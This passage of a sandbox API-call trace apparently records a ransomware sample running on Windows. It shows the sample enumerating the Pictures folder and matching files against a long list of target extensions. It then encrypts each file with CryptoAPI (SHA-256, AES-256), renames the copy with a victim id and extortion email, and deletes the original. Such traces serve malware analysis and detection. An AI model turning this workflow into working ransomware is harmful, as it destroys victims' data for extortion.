fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0195.578] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x311a3200, ftCreationTime.dwHighDateTime=0x1d966be, ftLastAccessTime.dwLowDateTime=0xc52fe40, ftLastAccessTime.dwHighDateTime=0x1d9751c, ftLastWriteTime.dwLowDateTime=0xc52fe40, ftLastWriteTime.dwHighDateTime=0x1d9751c, nFileSizeHigh=0x0, nFileSizeLow=0xae7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EFA5D.jpg", cAlternateFileName="")) returned 1
	[0195.578] lstrcmpW (lpString1="EFA5D.jpg", lpString2="..") returned 1
	[0195.578] lstrcmpW (lpString1="EFA5D.jpg", lpString2=".") returned 1
	[0195.578] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.578] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="EFA5D.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\EFA5D.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\EFA5D.jpg"
	[0195.578] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\EFA5D.jpg") returned 40
	[0195.578] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.578] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\EFA5D.jpg", cchLength=0x28 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg") returned 0x28
	[0195.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.579] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.579] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg"
	[0195.579] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg") returned 40
	[0195.579] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.579] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0195.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.580] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.580] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.580] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.580] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.582] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xae7a, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xae7a, lpOverlapped=0x0) returned 1
	[0195.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.584] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb000) returned 1
	[0195.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.585] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.585] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.586] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.586] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xae7a, dwBufLen=0xae7a | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xae80) returned 1
	[0195.587] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.587] RtlMoveMemory (in: Destination=0xfe8008, Source=0xfdd180, Length=0xae7a | out: Destination=0xfe8008) 
	[0195.587] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.587] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8008*, pdwDataLen=0x18bc0c*=0xae7a, dwBufLen=0xae80 | out: pbData=0xfe8008*, pdwDataLen=0x18bc0c*=0xae80) returned 1
	[0195.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.593] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.593] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0195.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.593] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0195.593] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.594] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.594] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.595] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 82
	[0195.595] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.596] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe8008*, nNumberOfBytesToWrite=0xae80, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe8008*, lpNumberOfBytesWritten=0x18c068*=0xae80, lpOverlapped=0x0) returned 1
	[0195.597] CloseHandle (hObject=0x2c0) returned 1
	[0195.598] CloseHandle (hObject=0x384) returned 1
	[0195.598] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg")) returned 1
	[0195.602] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\efa5d.jpg")) returned 0
	[0195.602] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e304f50, ftCreationTime.dwHighDateTime=0x1d96f12, ftLastAccessTime.dwLowDateTime=0x162385d0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x162385d0, ftLastWriteTime.dwHighDateTime=0x1d96f94, nFileSizeHigh=0x0, nFileSizeLow=0xc025, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F_D-.bmp", cAlternateFileName="")) returned 1
	[0195.602] lstrcmpW (lpString1="F_D-.bmp", lpString2="..") returned 1
	[0195.602] lstrcmpW (lpString1="F_D-.bmp", lpString2=".") returned 1
	[0195.602] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.602] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="F_D-.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\F_D-.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\F_D-.bmp"
	[0195.603] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\F_D-.bmp") returned 39
	[0195.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.603] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\F_D-.bmp", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp") returned 0x27
	[0195.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.603] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.603] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp") returned="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp"
	[0195.603] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp") returned 39
	[0195.603] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.607] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0195.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.608] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd